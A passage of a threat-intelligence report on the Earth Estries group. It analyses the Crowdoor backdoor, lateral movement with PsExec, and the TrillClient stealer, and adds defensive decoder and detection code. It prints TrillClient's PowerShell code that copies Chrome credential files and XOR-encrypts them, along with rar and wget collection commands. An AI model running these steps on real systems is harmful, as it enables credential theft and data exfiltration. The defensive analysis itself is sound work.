Crowdoor runs different routines depending on the argument it is launched with. Table 1 summarizes the behaviors of the new Crowdoor variant by argument. They closely match those of the older variant, except for the process used for injection (msiexec.exe) and the command IDs (compared in Table 2).
| Arguments | Operation |
|---|---|
| No argument | Establishes persistence through the registry Run key or a service, then restarts the backdoor |
| 0 | Establishes persistence through the registry Run key or a service, then restarts the backdoor |
| 1 | Restarts the backdoor by injecting into msiexec.exe |
| 2 | Calls the backdoor's main function |
Table 1. Overview of arguments and operations
| Old Crowdoor variant | New Crowdoor variant | Functionalities |
|---|---|---|
| 0x2347135 | 0x11736212 | Initial connection C2 |
| 0x2347136 | 0x11736213 | Collect ComputerName, Username, OS version, and host network/IP information |
| 0x2347137 | 0x11736214 | Remote shell |
| 0x234713B | 0x11736218 | Delete malware files, persistence and exit |
| 0x2347140 | 0x1173621D | File-related operations |
| 0x2347141 | 0x1173621E | Open/ReadFile |
| 0x2347142 | 0x1173621F | Open/WriteFile |
| 0x2347144 | 0x11736221 | Collect drive information |
| 0x2347145 | 0x11736222 | Search File |
| 0x2347148 | 0x11736225 | CreateDirectory |
| 0x2347149 | 0x11736226 | Rename file or directory |
| 0x234714A | 0x11736227 | Delete file or Directory |
| 0x234714A | 0x11736228 | Communication with C&C server |
Table 2. Comparative analysis of old and new Crowdoor versions
| Package 1 | Package 2 | Package 3 | Package 4 |
|---|---|---|---|
| WinStore.exe (Host) | K7Sysmon.exe (Host) | HxTsk.exe (Host) | MsMsRng.exe (Host) |
| Sqlite3.dll | K7Sysmn1.dll | d3d8.dll | sqlite3.dll |
| datastate.dll | K7Sysmn2.dll | HxTsk (encrypted) | msimg32.dll |
| datast.dll | K7Sysmn3.dll | datastate.dll | |
| WinStore (encrypted) | K7Sysmon.dll (encrypted) | | MsMsRng (encrypted) |
Table 3. Crowdoor packages
Lateral movement
Earth Estries uses PsExec to deploy its backdoors and utilities laterally. It copies the CAB files that contain the backdoors or tools together with a batch file that handles installation, persistence, and execution.
PsExec is mainly used to copy the CAB file holding the malware to the target host; in some cases WMIC is used instead to achieve the same result. A series of batch files is then copied and run to extract, install, and execute the malware. Batch files are also used for broader data collection.
In later stages of the attack, the backdoors themselves may be used to move laterally. CAB files still serve as containers for the tools being deployed, and batch files handle extraction, installation, and execution. In some cases the batch file itself is given a persistence mechanism, so that it acts as an indirect persistence point for the actual backdoors.
Discovery, collection, and exfiltration
TrillClient's user credential collection
Earth Estries collects user credentials to advance its objectives, using the TrillClient information stealer for this purpose. TrillClient primarily harvests credentials from browser user profiles. It launches a PowerShell script that copies each user's profile data into a staging location:
```powershell
# The "echo F" answers xcopy's "file or directory?" prompt so the copy runs unattended.
foreach ($win_user_path in $users_path) {
    echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Local State" "$copy_dest_path\$win_user_path\Local State" /C
}
```
Data is collected from the following locations:
- %LOCALAPPDATA%\Google\Chrome\User Data\Local State
- %LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Login Data
- %LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Network\Cookies
- %APPDATA%\Microsoft\Protect\*
The collected files are staged under %TEMP%\browser_temp_data\<RANDOM>, archived with the tar command, and encrypted with a simple XOR scheme:
```powershell
tar -cvf "$copy_dest_path\tar" $copy_dest_path;
$e_a = [System.IO.File]::ReadAllBytes("$copy_dest_path\tar");Remove-Item -Path $copy_dest_path -Recurse;
# Per-byte XOR: each byte is XORed with (index % 252) and with (0xe6 - (index % 199)).
$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 - ($e_i % 199)));$e_i += 1;}
$random_filename = "300775736611547784207972935122149919289871693";
$out_put_file = $out_put_path + "\" + $random_filename;
echo $out_put_file;
[System.IO.File]::WriteAllBytes($out_put_file, $e_a);
```
The encrypted archive is then sent to an attacker-controlled Gmail account over Simple Mail Transfer Protocol (SMTP).
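As an added example (not code from the report or from TrillClient itself), the Python below reimplements the script's XOR transform so an analyst who captures the outgoing blob can recover the tar archive. XOR with a position-dependent key is its own inverse, so one function both encodes and decodes. The sample archive contents, the profile file names inside it, and the "ustar" magic check are constructed here for the demo and are not taken from the report.

```python
import io
import tarfile


def trillclient_xor(data: bytes) -> bytes:
    """Apply the per-index XOR used by the TrillClient script:
    out[i] = data[i] ^ (i % 252) ^ (0xE6 - (i % 199)).
    0xE6 - (i % 199) never goes below 32, so the key byte is always in range.
    Since XOR is an involution, calling this twice returns the original bytes."""
    return bytes(b ^ (i % 252) ^ (0xE6 - (i % 199)) for i, b in enumerate(data))


def keystream(length: int) -> bytes:
    """The effective keystream for `length` bytes (what a zero-filled input becomes)."""
    return trillclient_xor(bytes(length))


def looks_like_tar(plain: bytes) -> bool:
    """Cheap sanity check after decoding: ustar/pax/GNU tar headers carry 'ustar' at offset 257."""
    return plain[257:262] == b"ustar"


def build_sample_blob() -> bytes:
    """Constructed stand-in for an exfiltrated blob: a tar of fake browser profile files,
    encoded the same way the script encodes its archive. Names and contents are assumptions."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in [
            ("alice/Local State", b'{"os_crypt": {"encrypted_key": "RFBBUEk..."}}'),
            ("alice/Default/Login Data", b"SQLite format 3\x00fake-login-db"),
        ]:
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return trillclient_xor(buf.getvalue())


def recover_archive(blob: bytes) -> dict:
    """Decode a captured blob and return {member name: bytes} for every regular file in it."""
    plain = trillclient_xor(blob)
    if not looks_like_tar(plain):
        raise ValueError("decoded data does not look like a tar archive")
    with tarfile.open(fileobj=io.BytesIO(plain), mode="r:") as tar:
        return {m.name: tar.extractfile(m).read() for m in tar.getmembers() if m.isfile()}


if __name__ == "__main__":
    blob = build_sample_blob()
    print("first key bytes:", keystream(4).hex())
    for name, content in recover_archive(blob).items():
        print(f"{name}: {len(content)} bytes, starts with {content[:16]!r}")
```

Because the keystream depends only on the byte index, the first bytes of every blob are XORed with the same values (0xE6, 0xE4, ...), which makes the encoding trivially recognizable and is also the basis for a content signature on the outbound mail attachment.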
Sensitive document collection
Earth Estries uses RAR to collect documents of interest. In this case, wget is used to fetch target files from an internal web-based document management system and save them into a staging folder before archiving.
- In one case, a script downloads PDF files with hardcoded document names into the collection folder:
- c:\users\public\music\temp\wget.exe -c "hxxp://172.16.xx.xx/{document path}/{Hardcoded Filename}.pdf" -P c:\users\public\music\temp
- The gathered PDFs are then compressed:
- C:\Windows\system32\cmd.exe /C C:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp\*.pdf
Collection via backdoor
Earth Estries also uses both Crowdoor and Cobalt Strike to collect data of interest from local and remote sources. Examples of routine collection commands include:
| Sample command | Operation |
|---|---|
| rar.exe a -m5 <install path>\322.rar \\<remote machine>\c$\<remote path> | Collect data from a remote machine over its administrative share (older malware variant) |
| rar.exe a -m5 <install path>\his231.rar "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History" | Collect browser history files that interest the attackers as a source of further credentials |
| rar.exe a <install path> | |
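As an added example, not part of the original report, the Python below turns the collection patterns above into simple checks over process command lines: an archiver adding files from a \\host\c$ administrative share or from a Chrome profile, an archive or downloaded files written into a public staging folder, and executables running from that folder. The sample command lines are constructed for the demo; the host name, IP address, and user names in them are assumptions, and the rule names are this example's own.

```python
import re

# Constructed sample process command lines (not telemetry from the report).
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /C C:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp\*.pdf',
    r'rar.exe a -m5 C:\ProgramData\322.rar \\FILESRV01\c$\Users\alice\Documents',
    r'rar.exe a -m5 C:\ProgramData\his231.rar "C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\History"',
    r'c:\users\public\music\temp\wget.exe -c http://172.16.10.5/docs/report.pdf -P c:\users\public\music\temp',
    r'"C:\Program Files\WinRAR\WinRAR.exe" x C:\Users\bob\Downloads\tools.rar C:\Users\bob\tools',
    r'C:\Windows\system32\notepad.exe C:\Users\bob\notes.txt',
]

_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
# \\host\c$\... (any single-letter administrative share)
_ADMIN_SHARE_RE = re.compile(r'^\\\\[^\\]+\\[a-z]\$(\\|$)', re.I)

STAGING_DIRS = ('c:\\users\\public\\', '\\appdata\\local\\temp\\', '\\windows\\temp\\')
BROWSER_ARTIFACTS = ('\\google\\chrome\\user data\\', '\\microsoft\\protect\\')
ARCHIVERS = {'rar.exe', 'winrar.exe'}
RAR_ADD_OPS = {'a', 'u', 'm'}  # add, update, move-to-archive


def tokenize(cmdline: str) -> list:
    """Split a Windows command line into tokens, keeping quoted paths whole."""
    return [q or u for q, u in _TOKEN_RE.findall(cmdline)]


def in_staging_dir(path: str) -> bool:
    p = path.lower()
    return any(s in p for s in STAGING_DIRS)


def analyze(cmdline: str) -> list:
    """Return the sorted list of collection-behaviour rules a command line triggers."""
    toks = tokenize(cmdline)
    hits = set()
    for i, tok in enumerate(toks):
        exe = tok.lower().rsplit('\\', 1)[-1]
        if exe.endswith('.exe') and in_staging_dir(tok):
            hits.add('executable-in-staging-dir')
        # Archiver invoked with an add-style operation: first positional is the archive,
        # the rest are the sources being collected.
        if exe in ARCHIVERS and i + 1 < len(toks) and toks[i + 1].lower() in RAR_ADD_OPS:
            positional = [a for a in toks[i + 2:] if not a.startswith('-')]
            if positional and in_staging_dir(positional[0]):
                hits.add('archiver-output-in-staging-dir')
            for src in positional[1:]:
                if _ADMIN_SHARE_RE.match(src):
                    hits.add('archiver-reads-admin-share')
                if any(b in src.lower() for b in BROWSER_ARTIFACTS):
                    hits.add('archiver-reads-browser-profile')
        # wget writing its downloads into a staging folder (-P / --directory-prefix).
        if exe == 'wget.exe':
            args = toks[i + 1:]
            for j, a in enumerate(args):
                dest = None
                if a == '-P' and j + 1 < len(args):
                    dest = args[j + 1]
                elif a.startswith('--directory-prefix='):
                    dest = a.split('=', 1)[1]
                if dest and in_staging_dir(dest):
                    hits.add('wget-output-to-staging-dir')
    return sorted(hits)


def scan(cmdlines) -> dict:
    """Map each command line that triggers at least one rule to its rule list."""
    return {c: r for c in cmdlines if (r := analyze(c))}


if __name__ == '__main__':
    for cmd, rules in scan(SAMPLE_CMDLINES).items():
        print(rules, '<-', cmd)
```

The checks are deliberately narrow: a user extracting an archive with WinRAR (the fifth sample) triggers nothing, while the report's own patterns each trip at least one rule. In production these would be applied to process-creation events (Sysmon Event ID 1 or EDR telemetry), and the staging-folder list tuned to what is normal in the environment.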
